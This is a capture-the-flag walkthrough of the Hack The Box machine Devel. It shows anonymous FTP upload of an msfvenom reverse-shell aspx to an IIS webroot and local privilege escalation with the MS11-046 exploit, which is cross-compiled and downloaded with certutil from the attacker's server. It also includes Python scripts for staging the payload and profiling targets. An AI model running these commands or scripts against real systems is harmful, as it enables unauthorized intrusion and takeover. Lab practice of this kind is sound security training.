nmap -A -p- -T4 -vvv -oN devel 10.10.10.5
FTP upload test
The nmap result shows that the FTP service allows anonymous login. Now I test whether I can upload files.
I can also list directories and files.
Test whether the files on the FTP share correspond to the pages served by the web server.
The iistart.htm page is also available there.
Test whether a file I upload is served by the web server.
Generate a reverse shell aspx
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.20 lport=4444 -f aspx -o devel.aspx
This file is then uploaded to the FTP server.
Get the Windows shell
nc -lvnp 4444
In the browser, open http://10.10.10.5/devel.aspx to trigger the reverse connection back to the listener.
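The upload-and-verify step above (anonymous FTP login, check whether the FTP root is the IIS webroot, then stage the .aspx) as a script. This is an added example, not code from the original writeup: the host and the devel.aspx name come from the writeup, while the random marker file, the helper names and the injected `fetch` callable are my own. Start the nc listener before requesting the trigger URL.

```python
"""Check whether an anonymous FTP root is the IIS webroot, then stage a payload.

Added example, not part of the original writeup. Host and payload name are
taken from the writeup; marker name and helper names are assumptions.
"""
import ftplib
import io
import secrets
import urllib.error
import urllib.request


def anonymous_login(host, port=21, timeout=10):
    """Log in as anonymous and return the ftplib session (raises on failure)."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=timeout)
    ftp.login()  # user "anonymous", default password
    return ftp


def http_fetch(url, timeout=10):
    """Return (status, body) for a GET; HTTP errors come back as a status."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, b""


def upload_bytes(ftp, name, data):
    """STOR an in-memory blob under the given remote name."""
    ftp.storbinary("STOR " + name, io.BytesIO(data))


def probe_webroot(ftp, fetch, base_url, marker=None):
    """Upload a random marker over FTP and request it over HTTP.

    Returns True only if the web server answers 200 with exactly the bytes
    we uploaded; a 404, a default page or any other body means the FTP
    root is not (or not directly) the webroot. `fetch` is injected so the
    logic can be exercised without a network. The marker is deleted
    afterwards whatever the outcome.
    """
    if marker is None:
        marker = secrets.token_hex(8) + ".txt"
    payload = ("probe " + secrets.token_hex(16)).encode()
    upload_bytes(ftp, marker, payload)
    try:
        status, body = fetch(base_url.rstrip("/") + "/" + marker)
        return status == 200 and body == payload
    finally:
        try:
            ftp.delete(marker)
        except ftplib.all_errors:
            pass


def stage_payload(ftp, local_path, remote_name):
    """Upload the msfvenom .aspx to the FTP root and return its remote name."""
    with open(local_path, "rb") as f:
        ftp.storbinary("STOR " + remote_name, f)
    return remote_name


if __name__ == "__main__":
    TARGET = "10.10.10.5"
    ftp = anonymous_login(TARGET)
    print("FTP listing:", ftp.nlst())
    mapped = probe_webroot(ftp, http_fetch, "http://" + TARGET)
    print("FTP root is the webroot:", mapped)
    if mapped:
        stage_payload(ftp, "devel.aspx", "devel.aspx")
        print("Listener up? Then request http://%s/devel.aspx" % TARGET)
    ftp.quit()
```

Comparing the fetched body with the uploaded bytes, rather than just checking for a 200, avoids a false positive when IIS serves a custom error page or a default document for unknown paths.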
Understand the system and get the exploit
The OS version is 6.1.7600 N/A Build 7600. After searching and testing a few exploits, this one works best: https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c. The conditions for using this exploit are a valid logon, which I already have, and the ability to execute the exploit locally on the target.
Also, although the virtual machine is 64-bit, the installed Windows 7 is a 32-bit version.
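The two facts that drive the choice above (build 7600, 32-bit OS) come from `systeminfo`. Here is an added example, not part of the original writeup, that parses `systeminfo` output into the fields that matter for picking and building a local exploit: kernel build, architecture (which decides the mingw target), and whether the hotfix for the chosen bulletin is already installed. The sample output is constructed to match the values the writeup reports; the KB number is the one Microsoft's MS11-046 bulletin ships as, and the helper names are my own.

```python
"""Classify a Windows target from `systeminfo` output.

Added example, not from the writeup. SAMPLE_SYSTEMINFO is constructed and
trimmed to the lines this script reads; real output has many more fields.
"""
import re

# Constructed sample matching the writeup's target (6.1.7600, 32-bit).
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Hotfix(s):                 N/A
"""

# The update MS11-046 (afd.sys, CVE-2011-1249) was delivered as.
MS11_046_KB = "KB2503665"

# Top-level "Key:   value" lines; indented hotfix entries ("[01]: KB...")
# deliberately do not match because they start with spaces then "[".
_FIELD = re.compile(r"^([A-Za-z0-9()/ -]+?):\s+(.*)$")


def parse_systeminfo(text):
    """Return a dict of the top-level fields plus a list of installed KBs."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            info[m.group(1).strip()] = m.group(2).strip()
        info["hotfixes"] += re.findall(r"KB\d{6,7}", line)
    return info


def target_profile(text, patched_kbs=()):
    """Summarise what matters for choosing and building a local exploit.

    build   - kernel build from "OS Version" (7600 = Windows 7 RTM, no SP)
    arch    - "x86" or "x64" from "System Type"; picks the cross compiler
    patched - which of `patched_kbs` are present among installed hotfixes,
              i.e. whether the corresponding bulletin has been applied
    """
    info = parse_systeminfo(text)
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", info.get("OS Version", ""))
    major, minor, build = map(int, m.groups()) if m else (0, 0, 0)
    arch = "x64" if "x64" in info.get("System Type", "").lower() else "x86"
    compiler = "x86_64-w64-mingw32-gcc" if arch == "x64" else "i686-w64-mingw32-gcc"
    return {
        "version": "%d.%d" % (major, minor),
        "build": build,
        "arch": arch,
        "compiler": compiler,
        "patched": sorted(set(info["hotfixes"]) & set(patched_kbs)),
    }


if __name__ == "__main__":
    profile = target_profile(SAMPLE_SYSTEMINFO, patched_kbs=[MS11_046_KB])
    for key, value in profile.items():
        print("%-9s %s" % (key + ":", value))
```

On the real box, pipe the output of `systeminfo` from the reverse shell into a file and pass it to `target_profile`; an empty `patched` list together with build 7600 is what makes 40564.c a candidate, and `arch` tells you which mingw triplet to compile it with.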
Compile the source code
I will compile the source code locally on Linux, then set up an HTTP server with Python, and use certutil on Devel to download the compiled binary.
A cross compiler is required to build the Windows binary in a Linux environment.
apt install mingw-w64
I need to compile the exploit as a 32-bit binary so that it runs on Devel.
i686-w64-mingw32-gcc 40564.c -o devel.exe -lws2_32
Set up an HTTP server on my Kali machine
python3 -m http.server 80
Then, on Devel, use
certutil -urlcache -f http://10.10.14.20/devel.exe C:\Users\Public\Downloads\devel.exe
From here I can get both the babis user's flag and the Administrator's flag.
After getting the flags, I exit the escalated shell to return to the original user, then delete the devel.exe I downloaded.
Although this is an easy machine, it is good practice to do the attack manually. Other solutions use Metasploit's exploit modules, but I wanted to see whether a manual way is possible. I also wanted to cross-compile another .cpp file to test whether that exploit works on Devel. Until next time.